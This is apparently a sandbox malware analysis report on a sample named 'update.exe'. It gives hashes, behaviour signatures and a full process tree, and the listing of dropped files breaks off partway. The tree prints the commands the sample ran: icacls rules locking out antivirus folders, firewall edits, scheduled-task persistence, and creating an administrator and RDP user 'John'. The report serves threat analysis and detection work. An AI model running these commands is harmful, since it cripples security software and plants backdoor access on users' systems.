Resubmissions

28/11/2022, 09:53

221128-lwp4eaea33 10

17/11/2022, 04:28

221117-e328zsdf69 10

07/11/2022, 10:35

221107-mm272secgj 10

Analysis

  • max time kernel
    50s
  • max time network
    113s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    07/11/2022, 10:35

General

  • Target

    update.exe

  • Size

    60.2MB

  • MD5

    b77955061c0f46de8059c20128ebb156

  • SHA1

    bd9ba700caec09387bfcf97bd9cc0a2e846836ca

  • SHA256

    ca94c8bbbb10febb8187f8c709affaa91911f646cf0ac99e857bf45b3a709091

  • SHA512

    83f07b66be1138e5f3f1c1f2504d3222bcc1bb1c1626a98e2346408cde7c771a64a998fa38c23ac66097f0b610f70c6309ea914e0c9c95ecff588a385aeb69aa

  • SSDEEP

    1572864:DdjkMwgaV4gRNzu1zCcFA4o/UDDvX94UKfytNxZhDa:FJGuMzuHnXDKfeN5Da

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocks application from running via registry modification 27 IoCs

    Adds application to list of disallowed applications.

  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 7 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Modifies file permissions 1 TTPs 26 IoCs
  • Themida packer 21 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 3 IoCs
  • AutoIT Executable 16 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • System policy modification 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\update.exe
    "C:\Users\Admin\AppData\Local\Temp\update.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • UAC bypass
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Blocks application from running via registry modification
    • Checks BIOS information in registry
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Modifies WinLogon
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2948
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Windows\system32\sc.exe
        sc delete swprv
        3⤵
        • Launches sc.exe
        PID:4548
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3096
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state on
        3⤵
        • Modifies Windows Firewall
        PID:4776
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        3⤵
        • Modifies Windows Firewall
        PID:4316
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3076
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4380
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        PID:1544
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3500
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        PID:4352
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3660
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        PID:4396
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        PID:2256
    • C:\ProgramData\Setup\Game.exe
      C:\ProgramData\Setup\Game.exe -pnaxui
      2⤵
        PID:4816
        • C:\ProgramData\RealtekHD\GameGuard.exe
          "C:\ProgramData\RealtekHD\GameGuard.exe"
          3⤵
            PID:1920
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
              4⤵
                PID:2000
                • C:\Windows\system32\icacls.exe
                  icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
                  5⤵
                  • Modifies file permissions
                  PID:4276
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                4⤵
                  PID:4392
                  • C:\Windows\system32\icacls.exe
                    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                    5⤵
                    • Modifies file permissions
                    PID:4404
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
                  4⤵
                    PID:4732
                    • C:\Windows\system32\icacls.exe
                      icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
                      5⤵
                      • Modifies file permissions
                      PID:2080
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                    4⤵
                      PID:4716
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                        5⤵
                        • Modifies file permissions
                        PID:5076
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
                      4⤵
                        PID:3836
                        • C:\Windows\system32\icacls.exe
                          icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
                          5⤵
                          • Modifies file permissions
                          PID:4076
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                        4⤵
                          PID:4856
                          • C:\Windows\system32\icacls.exe
                            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                            5⤵
                            • Modifies file permissions
                            PID:4484
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
                          4⤵
                            PID:3564
                            • C:\Windows\system32\icacls.exe
                              icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
                              5⤵
                              • Modifies file permissions
                              PID:4508
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                            4⤵
                              PID:4896
                              • C:\Windows\system32\icacls.exe
                                icacls c:\programdata\Malwarebytes /deny System:(F)
                                5⤵
                                • Modifies file permissions
                                PID:3136
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
                              4⤵
                                PID:1660
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Programdata\MB3Install /deny Администраторы:(F)
                                  5⤵
                                  • Modifies file permissions
                                  PID:360
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                4⤵
                                  PID:4248
                                  • C:\Windows\system32\icacls.exe
                                    icacls C:\Programdata\MB3Install /deny System:(F)
                                    5⤵
                                    • Modifies file permissions
                                    PID:1652
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                  4⤵
                                    PID:4156
                                    • C:\Windows\system32\icacls.exe
                                      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                      5⤵
                                      • Modifies file permissions
                                      PID:2344
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
                                    4⤵
                                      PID:4640
                                      • C:\Windows\system32\icacls.exe
                                        icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
                                        5⤵
                                        • Modifies file permissions
                                        PID:1836
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
                                      4⤵
                                        PID:4088
                                        • C:\Windows\system32\icacls.exe
                                          icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
                                          5⤵
                                          • Modifies file permissions
                                          PID:208
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
                                        4⤵
                                          PID:2312
                                          • C:\Windows\system32\icacls.exe
                                            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
                                            5⤵
                                            • Modifies file permissions
                                            PID:656
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
                                          4⤵
                                            PID:4624
                                            • C:\Windows\system32\icacls.exe
                                              icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
                                              5⤵
                                              • Modifies file permissions
                                              PID:3408
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                            4⤵
                                              PID:748
                                              • C:\Windows\system32\icacls.exe
                                                icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                5⤵
                                                • Modifies file permissions
                                                PID:1656
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny Администраторы:(OI)(CI)(F)
                                              4⤵
                                                PID:4080
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
                                                4⤵
                                                  PID:2232
                                                  • C:\Windows\system32\icacls.exe
                                                    icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
                                                    5⤵
                                                    • Modifies file permissions
                                                    PID:60
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny Администраторы:(OI)(CI)(F)
                                                  4⤵
                                                    PID:4596
                                                    • C:\Windows\system32\icacls.exe
                                                      icacls C:\FRST /deny Администраторы:(OI)(CI)(F)
                                                      5⤵
                                                      • Modifies file permissions
                                                      PID:2916
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
                                                    4⤵
                                                      PID:4280
                                                      • C:\Windows\system32\icacls.exe
                                                        icacls C:\FRST /deny system:(OI)(CI)(F)
                                                        5⤵
                                                        • Modifies file permissions
                                                        PID:4200
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
                                                      4⤵
                                                        PID:4904
                                                        • C:\Windows\system32\icacls.exe
                                                          icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
                                                          5⤵
                                                          • Modifies file permissions
                                                          PID:4556
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
                                                        4⤵
                                                          PID:4052
                                                          • C:\Windows\system32\icacls.exe
                                                            icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
                                                            5⤵
                                                            • Modifies file permissions
                                                            PID:4960
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                          4⤵
                                                            PID:580
                                                            • C:\Windows\system32\icacls.exe
                                                              icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                              5⤵
                                                              • Modifies file permissions
                                                              PID:4884
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
                                                            4⤵
                                                              PID:1040
                                                              • C:\Windows\system32\icacls.exe
                                                                icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
                                                                5⤵
                                                                • Modifies file permissions
                                                                PID:4428
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
                                                              4⤵
                                                                PID:4628
                                                                • C:\Windows\system32\icacls.exe
                                                                  icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
                                                                  5⤵
                                                                  • Modifies file permissions
                                                                  PID:4032
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
                                                                4⤵
                                                                  PID:4916
                                                                  • C:\Windows\system32\icacls.exe
                                                                    icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
                                                                    5⤵
                                                                    • Modifies file permissions
                                                                    PID:748
                                                              • C:\ProgramData\RealtekHD\taskhost.exe
                                                                "C:\ProgramData\RealtekHD\taskhost.exe"
                                                                3⤵
                                                                  PID:2164
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                    4⤵
                                                                      PID:2440
                                                                      • C:\Windows\system32\ipconfig.exe
                                                                        ipconfig /flushdns
                                                                        5⤵
                                                                        • Gathers network information
                                                                        PID:2444
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:4816
                                                                      • C:\Windows\system32\gpupdate.exe
                                                                        gpupdate /force
                                                                        5⤵
                                                                          PID:2916
                                                                      • C:\ProgramData\Setup\Packs.exe
                                                                        C:\ProgramData\Setup\Packs.exe -ppidar
                                                                        4⤵
                                                                          PID:2572
                                                                    • C:\ProgramData\Setup\svchost.exe
                                                                      C:/ProgramData/Setup/svchost.exe -pnaxui
                                                                      2⤵
                                                                        PID:4024
                                                                        • C:\ProgramData\Setup\IP.exe
                                                                          "C:\ProgramData\Setup\IP.exe"
                                                                          3⤵
                                                                            PID:1164
                                                                          • C:\ProgramData\Setup\smss.exe
                                                                            "C:\ProgramData\Setup\smss.exe"
                                                                            3⤵
                                                                              PID:212
                                                                              • C:\Windows\System32\schtasks.exe
                                                                                "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
                                                                                4⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3932
                                                                              • C:\Windows\System32\schtasks.exe
                                                                                "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
                                                                                4⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3884
                                                                              • C:\ProgramData\Windows Tasks Service\winserv.exe
                                                                                "C:\ProgramData\Windows Tasks Service\winserv.exe"
                                                                                4⤵
                                                                                  PID:4300
                                                                                  • C:\ProgramData\Windows Tasks Service\winserv.exe
                                                                                    "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
                                                                                    5⤵
                                                                                      PID:5092
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c net user John 12345 /add
                                                                                    4⤵
                                                                                      PID:1636
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net user John 12345 /add
                                                                                        5⤵
                                                                                          PID:3136
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 user John 12345 /add
                                                                                            6⤵
                                                                                              PID:4868
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
                                                                                          4⤵
                                                                                            PID:1608
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net localgroup "Администраторы" John /add
                                                                                              5⤵
                                                                                                PID:4440
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
                                                                                              4⤵
                                                                                                PID:4040
                                                                                                • C:\Windows\system32\net.exe
                                                                                                  net localgroup "Пользователи удаленного управления" john /add" John /add
                                                                                                  5⤵
                                                                                                    PID:4400
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                  4⤵
                                                                                                    PID:4716
                                                                                                    • C:\Windows\system32\net.exe
                                                                                                      net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                      5⤵
                                                                                                        PID:3472
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
                                                                                                      4⤵
                                                                                                        PID:944
                                                                                                        • C:\Windows\system32\net.exe
                                                                                                          net localgroup "Administrators" John /add
                                                                                                          5⤵
                                                                                                            PID:4828
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
                                                                                                          4⤵
                                                                                                            PID:3784
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
                                                                                                            4⤵
                                                                                                              PID:5064
                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                net localgroup "Remote Desktop Users" john /add
                                                                                                                5⤵
                                                                                                                  PID:4660
                                                                                                              • C:\ProgramData\RDPWinst.exe
                                                                                                                C:\ProgramData\RDPWinst.exe -i
                                                                                                                4⤵
                                                                                                                  PID:1164
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat
                                                                                                              2⤵
                                                                                                                PID:1640
                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                              netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                              1⤵
                                                                                                              • Modifies Windows Firewall
                                                                                                              PID:4768
                                                                                                            • C:\Windows\System32\spoolsv.exe
                                                                                                              C:\Windows\System32\spoolsv.exe
                                                                                                              1⤵
                                                                                                                PID:4892
                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                icacls C:\KVRT2020_Data /deny Администраторы:(OI)(CI)(F)
                                                                                                                1⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:2352
                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                C:\Windows\system32\net1 localgroup "Администраторы" John /add
                                                                                                                1⤵
                                                                                                                  PID:4452
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                                  1⤵
                                                                                                                    PID:492
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
                                                                                                                    1⤵
                                                                                                                      PID:3844
                                                                                                                    • C:\Windows\system32\net.exe
                                                                                                                      net localgroup "Administradores" John /add
                                                                                                                      1⤵
                                                                                                                        PID:3128
                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                          C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4024
                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                        C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                                                                                        1⤵
                                                                                                                          PID:4156
                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                          C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
                                                                                                                          1⤵
                                                                                                                            PID:1480
                                                                                                                          • C:\ProgramData\Windows Tasks Service\winserv.exe
                                                                                                                            "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
                                                                                                                            1⤵
                                                                                                                              PID:4596
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k networkservice -s TermService
                                                                                                                              1⤵
                                                                                                                                PID:488
                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                1⤵
                                                                                                                                  PID:1472

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v6

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\ProgramData\RDPWinst.exe

                                                                                                                                  Filesize

                                                                                                                                  1.4MB

                                                                                                                                  MD5

                                                                                                                                  3288c284561055044c489567fd630ac2

                                                                                                                                  SHA1

                                                                                                                                  11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                                                                                  SHA256

                                                                                                                                  ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                                                                                  SHA512

                                                                                                                                  c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                                                                                • C:\ProgramData\RDPWinst.exe

                                                                                                                                  Filesize

                                                                                                                                  1.4MB

                                                                                                                                  MD5

                                                                                                                                  3288c284561055044c489567fd630ac2

                                                                                                                                  SHA1

                                                                                                                                  11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                                                                                  SHA256

                                                                                                                                  ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                                                                                  SHA512

                                                                                                                                  c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                                                                                • C:\ProgramData\RealtekHD\GameGuard.exe

                                                                                                                                  Filesize

                                                                                                                                  5.0MB

                                                                                                                                  MD5

                                                                                                                                  32198d6a8e26f4e103885fc4eef3c2d7

                                                                                                                                  SHA1

                                                                                                                                  f35a0abab275eececc6410f69c5d041d14f3684e

                                                                                                                                  SHA256

                                                                                                                                  fc110064f6cee1dfb6793283a7bf1964347b1e6b29a0db8efc70dd77c15c85a1

                                                                                                                                  SHA512

                                                                                                                                  d25eaad411040c4b3dc8892594c717d820a0e2dc2bc10d68217a52351764691c8e1e17bc55c1e67fe550e3ffde1e01ab60e6dae8f75b5e1c182733bbc950485e

                                                                                                                                • C:\ProgramData\RealtekHD\GameGuard.exe

                                                                                                                                  Filesize

                                                                                                                                  5.0MB

                                                                                                                                  MD5

                                                                                                                                  32198d6a8e26f4e103885fc4eef3c2d7

                                                                                                                                  SHA1

                                                                                                                                  f35a0abab275eececc6410f69c5d041d14f3684e

                                                                                                                                  SHA256

                                                                                                                                  fc110064f6cee1dfb6793283a7bf1964347b1e6b29a0db8efc70dd77c15c85a1

                                                                                                                                  SHA512

                                                                                                                                  d25eaad411040c4b3dc8892594c717d820a0e2dc2bc10d68217a52351764691c8e1e17bc55c1e67fe550e3ffde1e01ab60e6dae8f75b5e1c182733bbc950485e

                                                                                                                                • C:\ProgramData\RealtekHD\taskhost.exe

                                                                                                                                  Filesize

                                                                                                                                  41.4MB

                                                                                                                                  MD5

                                                                                                                                  115d80c7793b7d61992771e5ebe726dd

                                                                                                                                  SHA1

                                                                                                                                  7bcc30d8a448a5173a475ce94a257778398e6f99

                                                                                                                                  SHA256

                                                                                                                                  a8380bd92f801b523392002545f77081fccdcd38c1bef164158ada9104f96e3e

                                                                                                                                  SHA512

                                                                                                                                  ad7fcd3670d2a5193e715b4360492ba1fdd4c7b196b797f2a5c9123c93fb5343eba720f08a8b72fba6bfe8086422730d012cd9e3b46e4a6ed79e52a95260f9d2

                                                                                                                                • C:\ProgramData\RealtekHD\taskhost.exe

                                                                                                                                  Filesize

                                                                                                                                  41.8MB

                                                                                                                                  MD5

                                                                                                                                  0bf9901d048e2edadc23d98f070cfb0a

                                                                                                                                  SHA1

                                                                                                                                  a42aa2f7af26fa48a536a86a9e6243e6c76d939a

                                                                                                                                  SHA256

                                                                                                                                  0de3c9fbe5476ba0253388011e0dfdd973014a1c149fd18f1ce97bd751a2d924

                                                                                                                                  SHA512

                                                                                                                                  95f8d645afb794cef72960c91dc26c276b3b566583f02657a36735023a3c63e5369b9f8dcb110bdfa73f7574e3a201c2025c53b7a0c42e4d15f920b5f94e64cd

                                                                                                                                • C:\ProgramData\Setup\Game.exe

                                                                                                                                  Filesize

                                                                                                                                  49.2MB

                                                                                                                                  MD5

                                                                                                                                  83cef00d7a37544a8016947ce6001bb3

                                                                                                                                  SHA1

                                                                                                                                  84623db68fb824f0c080fed2d856895c5a131583

                                                                                                                                  SHA256

                                                                                                                                  750353be3dcbca48295a9dd17654095f103295104c62e6b6c427d8a79f4aeffb

                                                                                                                                  SHA512

                                                                                                                                  1ee3c8853382159c12c3138c6f41ee8f951a365718865f83c6a4812be26453d0a3d18ef448e01307794337eac23d580dce8e68772f3db9432f87089295e1a670

                                                                                                                                • C:\ProgramData\Setup\Game.exe

                                                                                                                                  Filesize

                                                                                                                                  42.0MB

                                                                                                                                  MD5

                                                                                                                                  a2392adf554aa651c4392f3942db834c

                                                                                                                                  SHA1

                                                                                                                                  ddc89fd424c0d478e02ffeedc8e8c9a8233aabd7

                                                                                                                                  SHA256

                                                                                                                                  7047ce28c78a3c61f02023c826484be6a5a182ac0c25f6c679541cfedc1e3726

                                                                                                                                  SHA512

                                                                                                                                  e0dd08711e94aa139178e5647c8cc69a2cd3c47dbcd08d05a68e0f1c8598853531608f2b7921b2cc69f162cd81f6368071d9bf2b9701e32df2c75246ab20ab0e

                                                                                                                                • C:\ProgramData\Setup\IP.exe

                                                                                                                                  Filesize

                                                                                                                                  1.2MB

                                                                                                                                  MD5

                                                                                                                                  5b175607d344d38dd784dccb996b656a

                                                                                                                                  SHA1

                                                                                                                                  ce71176996c4559b4ef9125a16ec8a95c4ed9a75

                                                                                                                                  SHA256

                                                                                                                                  836faa0fb9c1012607cd26e3ce83ab3c4b5096f8e7ddd45cabc39858c47ba263

                                                                                                                                  SHA512

                                                                                                                                  f4825663d91615aeb07c13ecce1b5e43c6737fb7231c964a578bd1fdc9b3f7be2e5678ac6839116a00b0272c69cd314b46042d4c7cf948c9798c7e31009fcbb4

                                                                                                                                • C:\ProgramData\Setup\IP.exe

                                                                                                                                  Filesize

                                                                                                                                  1.2MB

                                                                                                                                  MD5

                                                                                                                                  5b175607d344d38dd784dccb996b656a

                                                                                                                                  SHA1

                                                                                                                                  ce71176996c4559b4ef9125a16ec8a95c4ed9a75

                                                                                                                                  SHA256

                                                                                                                                  836faa0fb9c1012607cd26e3ce83ab3c4b5096f8e7ddd45cabc39858c47ba263

                                                                                                                                  SHA512

